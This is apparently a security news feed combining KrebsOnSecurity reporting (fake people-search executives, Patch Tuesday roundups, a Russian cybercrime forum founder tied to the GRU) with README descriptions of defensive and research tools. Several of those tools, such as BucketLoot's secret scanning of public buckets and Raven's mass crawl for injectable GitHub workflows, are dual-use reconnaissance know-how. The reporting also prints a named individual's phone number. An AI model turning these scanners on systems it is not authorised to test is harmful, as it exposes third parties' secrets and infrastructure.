The same Alina Clark and photo materialized in a paid article at the website Ceoblognation, which in 2021 included her at #11 in a piece called “30 Entrepreneurs Describe The Big Hairy Audacious Goals (BHAGs) for Their Business.” It’s also worth noting that Ms. Clark is currently listed as a “former Forbes Council member” at the media outlet Forbes.com.

Entrepreneur #6 is Stephen Curry, who is quoted as CEO of CocoSign[.]com, a website that claims to offer an “easier, quicker, safer eSignature solution for small and medium-sized businesses.” Incidentally, the same photo for Stephen Curry #6 is also used in this “article” for #22 Jake Smith, who is named as the owner of a different company.

Stephen Curry, aka Jake Smith, aka no such person.

Mr. Curry’s LinkedIn profile shows a young man seated at a table in front of a laptop, but an online image search shows this is another stock photo. Cocosign[.]com was registered in June 2020 via Alibaba Cloud Beijing. No ownership details are available in the domain registration records.

Listed at #13 in that 30 Entrepreneurs article is Eden Cheng, who is cited as co-founder of PeopleFinderFree[.]com. KrebsOnSecurity could not find a LinkedIn profile for Ms. Cheng, but a search on her profile image from that Entrepreneurs article shows the same photo for sale at Shutterstock and other stock photo sites.

DomainTools says PeopleFinderFree was registered through Alibaba Cloud, Beijing. Attempts to purchase reports through PeopleFinderFree produce a notice saying the full report is only available via Spokeo.com.

Lynda Fairly is Entrepreneur #24, and she is quoted as co-founder of Numlooker[.]com, a domain registered in April 2021 through Alibaba in China. Searches for people on Numlooker forward visitors to Spokeo.

The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly. But a search on that photo shows this same portrait has been used by many other identities and names, including a woman from the United Kingdom who’s a cancer survivor and mother of five; a licensed marriage and family therapist in Canada; a software security engineer at Quora; a journalist on Twitter/X; and a marketing expert in Canada.

Cocofinder[.]com is a people-search service that launched in Sept. 2019, through Alibaba in China. Cocofinder lists its market officer as Harriet Chan, but Ms. Chan’s LinkedIn profile is just as sparse on work history as the other people-search owners mentioned already. An image search online shows that outside of LinkedIn, the profile photo for Ms. Chan has only ever appeared in articles at pay-to-play media sites, like this one from outbackteambuilding.com.

Perhaps because Cocodoc and Cocosign both sell software services, they are actually tied to a physical presence in the real world — in Singapore (15 Scotts Rd. #03-12 15, Singapore). But it’s difficult to discern much from this address alone.

Who’s behind all this people-search chicanery? A January 2024 review of various people-search services at the website techjury.com states that Cocofinder is a wholly-owned subsidiary of a Chinese company called Shenzhen Duiyun Technology Co.

“Though it only finds results from the United States, users can choose between four main search methods,” Techjury explains. Those include people search, phone, address and email lookup. This claim is supported by a Reddit post from three years ago, wherein the Reddit user “ProtectionAdvanced” named the same Chinese company.

Is Shenzhen Duiyun Technology Co. responsible for all these phony profiles? How many more fake companies and profiles are connected to this scheme? KrebsOnSecurity found other examples that didn’t appear directly tied to other fake executives listed here, but which nevertheless are registered through Alibaba and seek to drive traffic to Spokeo and other data brokers. For example, there’s the winsome Daniela Sawyer, founder of FindPeopleFast[.]net, whose profile is flogged in paid stories at entrepreneur.org.

Google currently turns up nothing else for in a search for Shenzhen Duiyun Technology Co. Please feel free to sound off in the comments if you have any more information about this entity, such as how to contact it. Or reach out directly at krebsonsecurity @ gmail.com.

A mind map highlighting the key points of research in this story. Click to enlarge. Image: KrebsOnSecurity.com

ANALYSIS

It appears the purpose of this network is to conceal the location of people in China who are seeking to generate affiliate commissions when someone visits one of their sites and purchases a people-search report at Spokeo, for example. And it is clear that Spokeo and others have created incentives wherein anyone can effectively white-label their reports, and thereby make money brokering access to peoples’ personal information.

Spokeo’s Wikipedia page says the company was founded in 2006 by four graduates from Stanford University. Spokeo co-founder and current CEO Harrison Tang has not yet responded to requests for comment.

Intelius is owned by San Diego based PeopleConnect Inc., which also owns Classmates.com, USSearch, TruthFinder and Instant Checkmate. PeopleConnect Inc. in turn is owned by H.I.G. Capital, a $60 billion private equity firm. Requests for comment were sent to H.I.G. Capital. This story will be updated if they respond.

BeenVerified is owned by a New York City based holding company called The Lifetime Value Co., a marketing and advertising firm whose brands include PeopleLooker, NeighborWho, Ownerly, PeopleSmart, NumberGuru, and Bumper, a car history site.

Ross Cohen, chief operating officer at The Lifetime Value Co., said it’s likely the network of suspicious people-finder sites was set up by an affiliate. Cohen said Lifetime Value would investigate to determine if this particular affiliate was driving them any sign-ups.

All of the above people-search services operate similarly. When you find the person you’re looking for, you are put through a lengthy (often 10-20 minute) series of splash screens that require you to agree that these reports won’t be used for employment screening or in evaluating new tenant applications. Still more prompts ask if you are okay with seeing “potentially shocking” details about the subject of the report, including arrest histories and photos.

Only at the end of this process does the site disclose that viewing the report in question requires signing up for a monthly subscription, which is typically priced around $35. Exactly how and from where these major people-search websites are getting their consumer data — and customers — will be the subject of further reporting here.

The main reason these various people-search sites require you to affirm that you won’t use their reports for hiring or vetting potential tenants is that selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically don’t include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

There are a growing number of online reputation management companies that offer to help customers remove their personal information from people-search sites and data broker databases. There are, no doubt, plenty of honest and well-meaning companies operating in this space, but it has been my experience that a great many people involved in that industry have a background in marketing or advertising — not privacy.

Also, some so-called data privacy companies may be wolves in sheep’s clothing. On March 14, KrebsOnSecurity published an abundance of evidence indicating that the CEO and founder of the data privacy company OneRep.com was responsible for launching dozens of people-search services over the years.

Finally, some of the more popular people-search websites are notorious for ignoring requests from consumers seeking to remove their information, regardless of which reputation or removal service you use. Some force you to create an account and provide more information before you can remove your data. Even then, the information you worked hard to remove may simply reappear a few months later.

This aptly describes countless complaints lodged against the data broker and people search giant Radaris. On March 8, KrebsOnSecurity profiled the co-founders of Radaris, two Russian brothers in Massachusetts who also operate multiple Russian-language dating services and affiliate programs.

The truth is that these people-search companies will continue to thrive unless and until Congress begins to realize it’s time for some consumer privacy and data protection laws that are relevant to life in the 21st century. Duke University adjunct professor Justin Sherman says virtually all state privacy laws exempt records that might be considered “public” or “government” documents, including voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

“Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman said.

Patch Tuesday, March 2024 Edition

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

MrHandler - Linux Incident Response Reporting

By: Zion3R

 


MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦
  $ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


Report



WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



Fat Patch Tuesday, February 2024 Edition

Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “Water Hydra,” which they say has being using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in Windows SmartScreen component that tries to screen out potentially malicious files downloaded from the Web. Kevin Breen at Immersive Labs says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

Satnam Narang, senior staff research engineer at Tenable, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

“We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

“Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

“Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

From Cybercrime Saul Goodman to the Russian GRU

In 2021, the exclusive Russian cybercrime forum Mazafaka was hacked. The leaked user database shows one of the forum’s founders was an attorney who advised Russia’s top hackers on the legal risks of their work, and what to do if they got caught. A review of this user’s hacker identities shows that during his time on the forums he served as an officer in the special forces of the GRU, the foreign military intelligence agency of the Russian Federation.

Launched in 2001 under the tagline “Network terrorism,” Mazafaka would evolve into one of the most guarded Russian-language cybercrime communities. The forum’s member roster included a Who’s Who of top Russian cybercriminals, and it featured sub-forums for a wide range of cybercrime specialities, including malware, spam, coding and identity theft.

One representation of the leaked Mazafaka database.

In almost any database leak, the first accounts listed are usually the administrators and early core members. But the Mazafaka user information posted online was not a database file per se, and it was clearly edited, redacted and restructured by whoever released it. As a result, it can be difficult to tell which members are the earliest users.

The original Mazafaka is known to have been launched by a hacker using the nickname “Stalker.” However, the lowest numbered (non-admin) user ID in the Mazafaka database belongs to another individual who used the handle “Djamix,” and the email address djamix@mazafaka[.]ru.

From the forum’s inception until around 2008, Djamix was one of its most active and eloquent contributors. Djamix told forum members he was a lawyer, and nearly all of his posts included legal analyses of various public cases involving hackers arrested and charged with cybercrimes in Russia and abroad.

“Hiding with purely technical parameters will not help in a serious matter,” Djamix advised Maza members in September 2007. “In order to ESCAPE the law, you need to KNOW the law. This is the most important thing. Technical capabilities cannot overcome intelligence and cunning.”

Stalker himself credited Djamix with keeping Mazafaka online for so many years. In a retrospective post published to Livejournal in 2014 titled, “Mazafaka, from conception to the present day,” Stalker said Djamix had become a core member of the community.

“This guy is everywhere,” Stalker said of Djamix. “There’s not a thing on [Mazafaka] that he doesn’t take part in. For me, he is a stimulus-irritant and thanks to him, Maza is still alive. Our rallying force!”

Djamix told other forum denizens he was a licensed attorney who could be hired for remote or in-person consultations, and his posts on Mazafaka and other Russian boards show several hackers facing legal jeopardy likely took him up on this offer.

“I have the right to represent your interests in court,” Djamix said on the Russian-language cybercrime forum Verified in Jan. 2011. “Remotely (in the form of constant support and consultations), or in person – this is discussed separately. As well as the cost of my services.”

WHO IS DJAMIX?

A search on djamix@mazafaka[.]ru at DomainTools.com reveals this address has been used to register at least 10 domain names since 2008. Those include several websites about life in and around Sochi, Russia, the site of the 2014 Winter Olympics, as well as a nearby coastal town called Adler. All of those sites say they were registered to an Aleksei Safronov from Sochi who also lists Adler as a hometown.

The breach tracking service Constella Intelligence finds that the phone number associated with those domains — +7.9676442212 — is tied to a Facebook account for an Aleksei Valerievich Safronov from Sochi. Mr. Safronov’s Facebook profile, which was last updated in October 2022, says his ICQ instant messenger number is 53765. This is the same ICQ number assigned to Djamix in the Mazafaka user database.

The Facebook account for Aleksey Safronov.

A “Djamix” account on the forum privetsochi[.]ru (“Hello Sochi”) says this user was born Oct. 2, 1970, and that his website is uposter[.]ru. This Russian language news site’s tagline is, “We Create Communication,” and it focuses heavily on news about Sochi, Adler, Russia and the war in Ukraine, with a strong pro-Kremlin bent.

Safronov’s Facebook profile also gives his Skype username as “Djamixadler,” and it includes dozens of photos of him dressed in military fatigues along with a regiment of soldiers deploying in fairly remote areas of Russia. Some of those photos date back to 2008.

In several of the images, we can see a patch on the arm of Safronov’s jacket that bears the logo of the Spetsnaz GRU, a special forces unit of the Russian military. According to a 2020 report from the Congressional Research Service, the GRU operates both as an intelligence agency — collecting human, cyber, and signals intelligence — and as a military organization responsible for battlefield reconnaissance and the operation of Russia’s Spetsnaz military commando units.

Mr. Safronov posted this image of himself on Facebook in 2016. The insignia of the GRU can be seen on his sleeve.

“In recent years, reports have linked the GRU to some of Russia’s most aggressive and public intelligence operations,” the CRS report explains. “Reportedly, the GRU played a key role in Russia’s occupation of Ukraine’s Crimea region and invasion of eastern Ukraine, the attempted assassination of former Russian intelligence officer Sergei Skripal in the United Kingdom, interference in the 2016 U.S. presidential elections, disinformation and propaganda operations, and some of the world’s most damaging cyberattacks.”

According to the Russia-focused investigative news outlet Meduza, in 2014 the Russian Defense Ministry created its “information-operation troops” for action in “cyber-confrontations with potential adversaries.”

“Later, sources in the Defense Ministry explained that these new troops were meant to ‘disrupt the potential adversary’s information networks,'” Meduza reported in 2018. “Recruiters reportedly went looking for ‘hackers who have had problems with the law.'”

Mr. Safronov did not respond to multiple requests for comment. A 2018 treatise written by Aleksei Valerievich Safronov titled “One Hundred Years of GRU Military Intelligence” explains the significance of the bat in the seal of the GRU.

“One way or another, the bat is an emblem that unites all active and retired intelligence officers; it is a symbol of unity and exclusivity,” Safronov wrote. “And, in general, it doesn’t matter who we’re talking about – a secret GRU agent somewhere in the army or a sniper in any of the special forces brigades. They all did and are doing one very important and responsible thing.”

It’s unclear what role Mr. Safronov plays or played in the GRU, but it seems likely the military intelligence agency would have exploited his considerable technical skills, knowledge and connections on the Russian cybercrime forums.

Searching on Safronov’s domain uposter[.]ru in Constella Intelligence reveals that this domain was used in 2022 to register an account at a popular Spanish-language discussion forum dedicated to helping applicants prepare for a career in the Guardia Civil, one of Spain’s two national police forces. Pivoting on that Russian IP in Constella shows three other accounts were created at the same Spanish user forum around the same date.

Mark Rasch is a former cybercrime prosecutor for the U.S. Department of Justice who now serves as chief legal officer for the New York cybersecurity firm Unit 221B. Rasch said there has always been a close relationship between the GRU and the Russian hacker community, noting that in the early 2000s the GRU was soliciting hackers with the skills necessary to hack US banks in order to procure funds to help finance Russia’s war in Chechnya.

“The guy is heavily hooked into the Russian cyber community, and that’s useful for intelligence services,” Rasch said. “He could have been infiltrating the community to monitor it for the GRU. Or he could just be a guy wearing a military uniform.”

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



Raven - CI/CD Security Analyzer

By: Zion3R


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

